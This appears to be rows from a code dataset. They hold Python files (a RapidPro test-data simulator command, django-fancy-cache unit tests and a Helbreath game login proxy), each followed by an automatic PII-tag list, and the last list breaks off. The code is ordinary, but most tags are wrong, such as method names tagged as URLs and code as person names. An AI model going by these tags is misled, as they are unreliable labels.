if c['gender']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['gender'],
string_value=c['gender']))
if c['age']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['age'],
string_value=str(c['age']), decimal_value=c['age']))
if c['joined']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['joined'],
string_value=datetime_to_str(c['joined']), datetime_value=c['joined']))
if c['ward']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['ward'],
string_value=c['ward'].name, location_value=c['ward']))
if c['district']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['district'],
string_value=c['district'].name, location_value=c['district']))
if c['state']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['state'],
string_value=c['state'].name, location_value=c['state']))
for g in c['groups']:
batch_memberships.append(ContactGroup.contacts.through(contact=c['object'], contactgroup=g))
batch_urns += c['urns']
ContactURN.objects.bulk_create(batch_urns)
Value.objects.bulk_create(batch_values)
ContactGroup.contacts.through.objects.bulk_create(batch_memberships)
def simulate_activity(self, orgs, num_runs):
self._log("Starting simulation. Ctrl+C to cancel...\n")
runs = 0
while runs < num_runs:
try:
with transaction.atomic():
# make sure every org has an active flow
for org in orgs:
if not org.cache['activity']:
self.start_flow_activity(org)
with transaction.atomic():
org = self.random_org(orgs)
if self.probability(0.1):
self.create_unsolicited_incoming(org)
else:
self.create_flow_run(org)
runs += 1
except KeyboardInterrupt:
self._log("Shutting down...\n")
break
squash_channelcounts()
squash_flowpathcounts()
squash_flowruncounts()
prune_recentmessages()
squash_topupcredits()
squash_labelcounts()
def start_flow_activity(self, org):
assert not org.cache['activity']
user = org.cache['users'][0]
flow = self.random_choice(org.cache['flows'])
if self.probability(0.9):
# start a random group using a flow start
group = self.random_choice(org.cache['groups'])
contacts_started = list(group.contacts.values_list('id', flat=True))
self._log(" > Starting flow %s for group %s (%d) in org %s\n"
% (flow.name, group.name, len(contacts_started), org.name))
start = FlowStart.create(flow, user, groups=[group], restart_participants=True)
start.start()
else:
# start a random individual without a flow start
if not org.cache['contacts']:
return
contact = Contact.objects.get(id=self.random_choice(org.cache['contacts']))
contacts_started = [contact.id]
self._log(" > Starting flow %s for contact #%d in org %s\n" % (flow.name, contact.id, org.name))
flow.start([], [contact], restart_participants=True)
org.cache['activity'] = {'flow': flow, 'unresponded': contacts_started, 'started': list(contacts_started)}
def end_flow_activity(self, org):
self._log(" > Ending flow %s for in org %s\n" % (org.cache['activity']['flow'].name, org.name))
org.cache['activity'] = None
runs = FlowRun.objects.filter(org=org, is_active=True)
FlowRun.bulk_exit(runs, FlowRun.EXIT_TYPE_EXPIRED)
def create_flow_run(self, org):
activity = org.cache['activity']
flow = activity['flow']
if activity['unresponded']:
contact_id = self.random_choice(activity['unresponded'])
activity['unresponded'].remove(contact_id)
contact = Contact.objects.get(id=contact_id)
urn = contact.urns.first()
if urn:
self._log(" > Receiving flow responses for flow %s in org %s\n" % (flow.name, flow.org.name))
inputs = self.random_choice(flow.input_templates)
for text in inputs:
channel = flow.org.cache['channels'][0]
Msg.create_incoming(channel, six.text_type(urn), text)
# if at least 10% of contacts have responded, consider flow activity over
if len(activity['unresponded']) <= (len(activity['started']) * 0.9):
self.end_flow_activity(flow.org)
def create_unsolicited_incoming(self, org):
if not org.cache['contacts']:
return
self._log(" > Receiving unsolicited incoming message in org %s\n" % org.name)
available_contacts = list(set(org.cache['contacts']) - set(org.cache['activity']['started']))
if available_contacts:
contact = Contact.objects.get(id=self.random_choice(available_contacts))
channel = self.random_choice(org.cache['channels'])
urn = contact.urns.first()
if urn:
text = ' '.join([self.random_choice(l) for l in INBOX_MESSAGES])
Msg.create_incoming(channel, six.text_type(urn), text)
def probability(self, prob):
return self.random.random() < prob
def random_choice(self, seq, bias=1.0):
if not seq:
raise ValueError("Can't select random item from empty sequence")
return seq[int(math.pow(self.random.random(), bias) * len(seq))]
def weighted_choice(self, seq, weights):
r = self.random.random() * sum(weights)
cum_weight = 0.0
for i, item in enumerate(seq):
cum_weight += weights[i]
if r < cum_weight or (i == len(seq) - 1):
return item
def random_org(self, orgs):
"""
Returns a random org with bias toward the orgs with the lowest indexes
"""
return self.random_choice(orgs, bias=self.org_bias)
def random_date(self, start=None, end=None):
if not end:
end = timezone.now()
if not start:
start = end - timedelta(days=365)
if start == end:
return end
return ms_to_datetime(self.random.randrange(datetime_to_ms(start), datetime_to_ms(end)))
def timeline_date(self, dist):
"""
Converts a 0..1 distance into a date on this database's overall timeline
"""
seconds_span = (self.db_ends_on - self.db_begins_on).total_seconds()
return self.db_begins_on + timedelta(seconds=(seconds_span * dist))
@staticmethod
def peak_memory():
rusage_denom = 1024
if sys.platform == 'darwin':
# OSX gives value in bytes, other OSes in kilobytes
rusage_denom *= rusage_denom
return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / rusage_denom
def _log(self, text):
self.stdout.write(text, ending='')
self.stdout.flush()
class DisableTriggersOn(object):
"""
Helper context manager for temporarily disabling database triggers for a given model
"""
def __init__(self, *models):
self.tables = [m._meta.db_table for m in models]
def __enter__(self):
with connection.cursor() as cursor:
for table in self.tables:
cursor.execute('ALTER TABLE %s DISABLE TRIGGER ALL;' % table)
def __exit__(self, exc_type, exc_val, exc_tb):
with connection.cursor() as cursor:
for table in self.tables:
cursor.execute('ALTER TABLE %s ENABLE TRIGGER ALL;' % table)
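# A minimal standalone sketch (not part of the original source) of the biased
# sampling used by Command.random_choice above; it needs no Django, and the
# seed and draw counts are illustrative.
def _biased_choice_demo():  # pragma: no cover
    import math
    import random as stdlib_random
    rng = stdlib_random.Random(1)
    orgs = list(range(100))
    bias = math.log(1.0 / len(orgs), 0.5)
    # same expression as Command.random_choice: r ** bias scaled to an index
    picks = [orgs[int(math.pow(rng.random(), bias) * len(orgs))]
             for _ in range(10000)]
    share = picks.count(0) / float(len(picks))
    assert 0.45 < share < 0.55   # the first org gets ~50% of the draws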
| 30,703 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['LOCATION', 'django_redis'], ['LOCATION', 'URN'], ['LOCATION', 'ms_to_datetime'], ['LOCATION', 'USER_PASSWORD'], ['LOCATION', 'Chile'], ['LOCATION', 'Indonesia'], ['LOCATION', 'Rwanda'], ['LOCATION', 'Mexico'], ['LOCATION', 'Zambia'], ['LOCATION', 'India'], ['LOCATION', 'Brazil'], ['LOCATION', 'Sudan'], ['LOCATION', 'TYPE_ANDROID'], ['LOCATION', 'Faskari'], ['LOCATION', 'Zuru'], ['PERSON', 'Anka'], ['PERSON', "c['district'].name"], ['PERSON', 'Anka'], ['PERSON', 'LABELS'], ['PERSON', 'jeb'], ['PERSON', 'Anne'], ['PERSON', 'Bob'], ['PERSON', 'Cathy'], ['PERSON', 'Dave'], ['PERSON', 'Evan'], ['PERSON', 'George'], ['PERSON', 'Igor'], ['PERSON', 'Jameson'], ['PERSON', 'Lopez'], ['PERSON', 'Mooney'], ['PERSON', 'Roberts'], ['NRP', 'CONTACT_HAS_TWITTER_PROB'], ['DATE_TIME', 'today'], ['LOCATION', 'USER_PASSWORD'], ['LOCATION', 'DISTRICT'], ['LOCATION', 'USER_PASSWORD'], ['NRP', "org.cache['users'].append(user"], ['PERSON', 'len(CHANNELS'], ['PERSON', 'group.member'], ['PERSON', 'LABELS'], ['NRP', 'index_batch'], ['PERSON', 'tweep'], ['LOCATION', 'group.name'], ['PERSON', 'darwin'], ['DATE_TIME', 'RUSAGE_SELF).ru_maxrss / rusage_denom'], ['URL', 'https://github.com/joke2k/faker/issues/484#issuecomment-287931101'], ['URL', 'django.co'], ['URL', 'django.contrib.auth.mo'], ['URL', 'django.core.ma'], ['URL', 'django.core.management.ba'], ['URL', 'temba.channels.mo'], ['URL', 'temba.ch'], ['URL', 'temba.contacts.mo'], ['URL', 'temba.flows.mo'], ['URL', 'temba.locations.mo'], ['URL', 'temba.msgs.mo'], ['URL', 'temba.ms'], ['URL', 'temba.orgs.mo'], ['URL', 'temba.org'], ['URL', 'temba.values.mo'], ['URL', 'nigeria.bi'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'parser.ad'], ['URL', 'subparsers.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'subparsers.ad'], ['URL', 'parser.ad'], ['URL', 'self.COM'], ['URL', 'self.pe'], ['URL', 'self.co'], ['URL', 'self.ba'], ['URL', 'timezone.no'], ['URL', 'self.style.SU'], ['URL', 'User.objects.cr'], ['URL', 'email.com'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.co'], ['URL', 'Channel.CH'], ['URL', 'flow.in'], ['URL', 'flow.na'], ['URL', 'org.ca'], ['URL', 'org.ge'], ['URL', 'org.ch'], ['URL', 'ContactGroup.us'], ['URL', 'groups.fi'], ['URL', 'org.org'], ['URL', 'contacts.va'], ['URL', 'self.style.SU'], ['URL', 'self.si'], ['URL', 'self.random.ge'], ['URL', 'self.org'], ['URL', 'AdminBoundary.objects.fi'], ['URL', 'w.pa'], ['URL', 'w.parent.pa'], ['URL', 'AdminBoundary.objects.fi'], ['URL', 'self.style.SU'], ['URL', 'self.random.sh'], ['URL', 'self.random.ch'], ['URL', 'pytz.al'], ['URL', 'rapidpro.io'], ['URL', 'self.style.SU'], ['URL', 'org.in'], ['URL', 'org.ca'], ['URL', 'g.gr'], ['URL', 'ContactGroup.sy'], ['URL', 'groups.fi'], ['URL', 'self.style.SU'], ['URL', 'User.objects.cr'], ['URL', 'org.id'], ['URL', 'org.id'], ['URL', 'user.se'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Channel.objects.cr'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'ContactField.objects.cr'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'ContactGroup.cr'], ['URL', 'ContactGroup.us'], ['URL', 
'groups.cr'], ['URL', 'group.me'], ['URL', 'group.co'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Label.la'], ['URL', 'objects.cr'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'org.im'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Contact.ge'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'six.mo'], ['URL', 'self.ba'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'self.pro'], ['URL', 'name.re'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'g.me'], ['URL', 'g.me'], ['URL', 'self.pro'], ['URL', 'g.me'], ['URL', 'self.ba'], ['URL', 'counts.it'], ['URL', 'group.co'], ['URL', 'URN.fr'], ['URL', 'URN.fr'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'transaction.at'], ['URL', 'org.ca'], ['URL', 'self.st'], ['URL', 'transaction.at'], ['URL', 'self.pro'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'group.contacts.va'], ['URL', 'flow.na'], ['URL', 'group.na'], ['URL', 'org.na'], ['URL', 'FlowStart.cr'], ['URL', 'start.st'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'org.ca'], ['URL', 'contact.id'], ['URL', 'flow.na'], ['URL', 'contact.id'], ['URL', 'org.na'], ['URL', 'flow.st'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.na'], ['URL', 'org.ca'], ['URL', 'FlowRun.objects.fi'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'contact.urns.fi'], ['URL', 'flow.na'], ['URL', 'flow.org.na'], ['URL', 'flow.in'], ['URL', 'flow.org.ca'], ['URL', 'Msg.cr'], ['URL', 'flow.org'], ['URL', 'org.ca'], ['URL', 'org.na'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'org.ca'], ['URL', 'contact.urns.fi'], ['URL', 'Msg.cr'], ['URL', 'self.org'], ['URL', 'timezone.no'], ['URL', 'sys.pl'], ['URL', 'resource.ge'], ['URL', 'resource.RU'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'connection.cu'], ['URL', 'connection.cu']] |
87 | import unittest
import re
from nose.tools import eq_, ok_
from django.test.client import RequestFactory
from django.core.cache import cache
from fancy_cache.memory import find_urls
from . import views
class TestViews(unittest.TestCase):
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_render_home1(self):
request = self.factory.get('/anything')
response = views.home(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
# do it again
response = views.home(request)
eq_(response.status_code, 200)
random_string_2 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
eq_(random_string_1, random_string_2)
def test_render_home2(self):
authenticated = RequestFactory(AUTH_USER='peter')
request = self.factory.get('/2')
response = views.home2(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
# do it again
response = views.home2(request)
eq_(response.status_code, 200)
random_string_2 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
eq_(random_string_1, random_string_2)
# do it again, but with a hint to disable cache
request = authenticated.get('/2')
response = views.home2(request)
eq_(response.status_code, 200)
random_string_2 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
ok_(random_string_1 != random_string_2)
def test_render_home3(self):
request = self.factory.get('/anything')
response = views.home3(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
ok_('In your HTML' in response.content.decode("utf8"))
extra_random_1 = re.findall('In your HTML:(\w+)', response.content.decode("utf8"))[0]
response = views.home3(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_2 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
extra_random_2 = re.findall('In your HTML:(\w+)', response.content.decode("utf8"))[0]
ok_('In your HTML' in response.content.decode("utf8"))
eq_(random_string_1, random_string_2)
# the post_process_response is only called once
eq_(extra_random_1, extra_random_2)
def test_render_home3_no_cache(self):
factory = RequestFactory(AUTH_USER='peter')
request = factory.get('/3')
response = views.home3(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
ok_('In your HTML' not in response.content.decode("utf8"))
def test_render_home4(self):
request = self.factory.get('/4')
response = views.home4(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
ok_('In your HTML' in response.content.decode("utf8"))
extra_random_1 = re.findall('In your HTML:(\w+)', response.content.decode("utf8"))[0]
response = views.home4(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_2 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
extra_random_2 = re.findall('In your HTML:(\w+)', response.content.decode("utf8"))[0]
ok_('In your HTML' in response.content.decode("utf8"))
eq_(random_string_1, random_string_2)
# the post_process_response is now called every time
ok_(extra_random_1 != extra_random_2)
def test_render_home5(self):
request = self.factory.get('/4', {'foo': 'bar'})
response = views.home5(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
request = self.factory.get('/4', {'foo': 'baz'})
response = views.home5(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_2 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
ok_(random_string_1 != random_string_2)
request = self.factory.get('/4', {'foo': 'baz', 'other': 'junk'})
response = views.home5(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_3 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
eq_(random_string_2, random_string_3)
def test_render_home5bis(self):
request = self.factory.get('/4', {'foo': 'bar'})
response = views.home5bis(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
request = self.factory.get('/4', {'foo': 'baz'})
response = views.home5bis(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_2 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
ok_(random_string_1 != random_string_2)
request = self.factory.get('/4', {'foo': 'baz', 'bar': 'foo'})
response = views.home5bis(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_3 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
eq_(random_string_2, random_string_3)
def test_remember_stats_all_urls(self):
request = self.factory.get('/anything')
response = views.home6(request)
eq_(response.status_code, 200)
# now ask the memory thing
match, = find_urls(urls=['/anything'])
eq_(match[0], '/anything')
eq_(match[2]['hits'], 0)
eq_(match[2]['misses'], 1)
# second time
response = views.home6(request)
eq_(response.status_code, 200)
match, = find_urls(urls=['/anything'])
eq_(match[0], '/anything')
eq_(match[2]['hits'], 1)
eq_(match[2]['misses'], 1)
def test_remember_stats_all_urls_looong_url(self):
request = self.factory.get(
'/something/really/'  # redacted in the source; the assertions below only need this prefix
'test/that/things/work/with/long/urls/too',
{
'line1': 'Bad luck, wind been blowing at my back',
'line2': "I was born to bring trouble to wherever I'm at",
'line3': "Got the number thirteen, tattooed on my neck",
'line4': "When the ink starts to itch, ",
'line5': "then the black will turn to red",
}
)
response = views.home6(request)
eq_(response.status_code, 200)
# now ask the memory thing
match, = find_urls()
ok_(match[0].startswith('/something/really'))
eq_(match[2]['hits'], 0)
eq_(match[2]['misses'], 1)
# second time
response = views.home6(request)
eq_(response.status_code, 200)
match, = find_urls([])
ok_(match[0].startswith('/something/really'))
eq_(match[2]['hits'], 1)
eq_(match[2]['misses'], 1)
| 7,974 | [['LOCATION', 'TestCase'], ['LOCATION', 'random_string_2'], ['LOCATION', 'random_string_2'], ['LOCATION', 'random_string_2'], ['NRP', 'post_process_response'], ['LOCATION', 'random_string_2'], ['NRP', 'post_process_response'], ['URL', 'self.factory.ge'], ['URL', 'self.factory.ge'], ['URL', 'nose.to'], ['URL', 'django.test.cl'], ['URL', 'django.core.ca'], ['URL', 'cache.me'], ['URL', 'cache.cl'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'authenticated.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 'response.st'], ['URL', 'response.st'], ['URL', 'response.st']] |
88 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# hb_balancer
# High performance load balancer between Helbreath World Servers.
#
# Copyright (C) 2012 Michał Papierski dummy@email.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import struct
import random
import logging
from twisted.internet import reactor
from twisted.protocols.stateful import StatefulProtocol
from twisted.python import log
from packets import Packets
class BaseHelbreathProtocol(StatefulProtocol):
''' Basic Helbreath Protocol '''
def getInitialState(self):
'''
Protocol overview:
[Key unsigned byte] [Size unsigned short] [Data Size-bytes]
'''
return (self.get_key, 1)
def get_key(self, data):
''' Get key '''
self.key, = struct.unpack('<B', data)
return (self.get_data_size, 2)
def get_data_size(self, data):
''' Read data size '''
self.data_size, = struct.unpack('<H', data)
return (self.get_data, self.data_size - 3)
def get_data(self, data):
''' Read encoded data and decode it '''
if self.key > 0:
# Decode
data = list(data)
for i in range(len(data)):
data[i] = chr(((ord(data[i]) ^ (self.key ^ (self.data_size - 3 - i))) - (i ^ self.key)) % 256)
data = ''.join(data)
# Pass decoded data
self.raw_data(data)
return (self.get_key, 1)
def send_message(self, data):
''' Send a Helbreath Packet data '''
key = random.randint(0, 255)
if key > 0:
# Encode
data = list(data)
for i in range(len(data)):
data[i] = chr(((ord(data[i]) + (i ^ key)) ^ (key ^ (len(data) - i))) % 256)
data = ''.join(data)
self.transport.write(struct.pack('<BH', key, len(data) + 3) + data)
def raw_data(self, data):
''' Got packet '''
pass
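# A minimal round-trip sketch (not part of the original source) of the packet
# cipher implemented by get_data and send_message above, rewritten as plain
# expressions so it can be checked without a transport; the key and payload
# values are illustrative.
def _codec_roundtrip_demo():  # pragma: no cover
    key, payload = 42, 'hello world'
    data_size = len(payload) + 3      # key byte + size short + payload bytes
    # encode: same arithmetic as send_message
    enc = [chr(((ord(c) + (i ^ key)) ^ (key ^ (len(payload) - i))) % 256)
           for i, c in enumerate(payload)]
    # decode: same arithmetic as get_data (data_size - 3 == payload length)
    dec = [chr(((ord(c) ^ (key ^ (data_size - 3 - i))) - (i ^ key)) % 256)
           for i, c in enumerate(enc)]
    assert ''.join(dec) == payload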
class ProxyHelbreathProtocol(BaseHelbreathProtocol):
''' Proxy Helbreath protocol used for proxying packets '''
def connectionMade(self):
self.factory.success(self)
def login(self, account_name, account_password, world_name):
''' Request a login '''
# Cast to str explicitly because world_name
# could be either str or unicode.
self.send_message(struct.pack('<IH10s10s30s',
Packets.MSGID_REQUEST_LOGIN, # MsgID
0, # MsgType
str(account_name),
str(account_password),
str(world_name)))
def raw_data(self, data):
self.factory.receiver(data)
self.transport.loseConnection()
class HelbreathProtocol(BaseHelbreathProtocol):
def raw_data(self, data):
# Header
msg_id, msg_type = struct.unpack('<IH', data[:6])
# Process packet data
if msg_id == Packets.MSGID_REQUEST_LOGIN:
# Client is requesting login
packet_format = '<10s10s30s'
account_name, account_password, world_name = struct.unpack(
packet_format,
data[6:]
)
self.request_login(
account_name.rstrip('\x00'),
account_password.rstrip('\x00'),
world_name.rstrip('\x00')
)
elif msg_id == Packets.MSGID_REQUEST_ENTERGAME:
# Client is trying to enter game
packet_format = '<10s10s10s10si30s120s'
player_name, map_name, account_name, account_password, \
level, world_name, cmd_line = struct.unpack(
packet_format,
data[6:])
self.request_entergame(
msg_type,
player_name.rstrip('\x00'),
map_name.rstrip('\x00'),
account_name.rstrip('\x00'),
account_password.rstrip('\x00'),
level,
world_name.rstrip('\x00'),
cmd_line.rstrip('\x00'))
else:
# Abort if a packet is not (yet) known
self.transport.loseConnection()
def request_login(self, account_name, account_password, world_name):
''' Request client login
account_name -- Account name
account_password -- Account password
world_name -- World server name
'''
def world_is_down(failure = None):
''' The requested world is offline '''
self.send_message(struct.pack('<IH',
Packets.MSGID_RESPONSE_LOG,
Packets.DEF_LOGRESMSGTYPE_NOTEXISTINGWORLDSERVER))
reactor.callLater(10, self.transport.loseConnection)
def handle_response(data):
''' Pass data and close the connection nicely '''
self.send_message(data)
reactor.callLater(10, self.transport.loseConnection)
def connection_made(remote):
''' Connection is made. Request a login. '''
log.msg('Remote connection made!')
remote.login(
account_name,
account_password,
remote.factory.world_name
)
# Request connection to a world by its name, pass some callbacks
self.factory.connect_to_world(
world_name = world_name,
receiver = handle_response,
success = connection_made,
failure = world_is_down)
log.msg('Request world %s' % (world_name, ))
def request_entergame(self, msg_type, player_name, map_name, account_name,
account_password, level, world_name, cmd_line):
''' Client wants to enter game. '''
log.msg('Request entergame player(%s) map(%s) account(%s) world(%s)' % (
player_name, map_name, account_name, world_name))
def connection_made(remote):
            ''' Request enter game, construct exactly the same data.
TODO: Parse the msg_type. '''
log.msg('Requesting enter game...')
remote.send_message(struct.pack('<IH10s10s10s10si30s120s',
Packets.MSGID_REQUEST_ENTERGAME,
msg_type,
player_name,
map_name,
account_name,
account_password,
level,
str(remote.factory.world_name),
cmd_line))
def error_handler(failure = None):
''' Unable to connect to destination world '''
log.err('Enter game error for account(%s) at world(%s)' % (
account_name,
world_name))
self.send_message(struct.pack('<IHB',
Packets.MSGID_RESPONSE_ENTERGAME,
Packets.DEF_ENTERGAMERESTYPE_REJECT,
Packets.DEF_REJECTTYPE_DATADIFFERENCE))
reactor.callLater(10, self.transport.loseConnection)
def response_handler(data):
''' Pass the (modified) data '''
self.send_message(data)
self.factory.connect_to_world(
world_name = world_name,
receiver = response_handler,
success = connection_made,
failure = error_handler
)
| 6,549 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2012'], ['PERSON', 'Michał Papierski'], ['LOCATION', 'MsgID'], ['PERSON', 'TODO'], ['PERSON', 'Parse'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'twisted.int'], ['URL', 'twisted.protocols.st'], ['URL', 'twisted.py'], ['URL', 'self.ge'], ['URL', 'self.ke'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ke'], ['URL', 'self.ke'], ['URL', 'self.ke'], ['URL', 'self.ge'], ['URL', 'self.tr'], ['URL', 'struct.pa'], ['URL', 'self.factory.su'], ['URL', 'self.se'], ['URL', 'struct.pa'], ['URL', 'Packets.MS'], ['URL', 'self.factory.re'], ['URL', 'self.tr'], ['URL', 'Packets.MS'], ['URL', 'self.re'], ['URL', 'name.rs'], ['URL', 'password.rs'], ['URL', 'name.rs'], ['URL', 'Packets.MS'], ['URL', 'self.re'], ['URL', 'name.rs'], ['URL', 'name.rs'], ['URL', 'name.rs'], ['URL', 'password.rs'], ['URL', 'name.rs'], ['URL', 'line.rs'], ['URL', 'self.tr'], ['URL', 'self.se'], ['URL', 'struct.pa'], ['URL', 'Packets.MS'], ['URL', 'Packets.DE'], ['URL', 'reactor.ca'], ['URL', 'self.tr'], ['URL', 'self.se'], ['URL', 'reactor.ca'], ['URL', 'self.tr'], ['URL', 'log.ms'], ['URL', 'self.factory.co'], ['URL', 'log.ms'], ['URL', 'log.ms'], ['URL', 'log.ms'], ['URL', 'remote.se'], ['URL', 'struct.pa'], ['URL', 'Packets.MS'], ['URL', 'log.er'], ['URL', 'self.se'], ['URL', 'struct.pa'], ['URL', 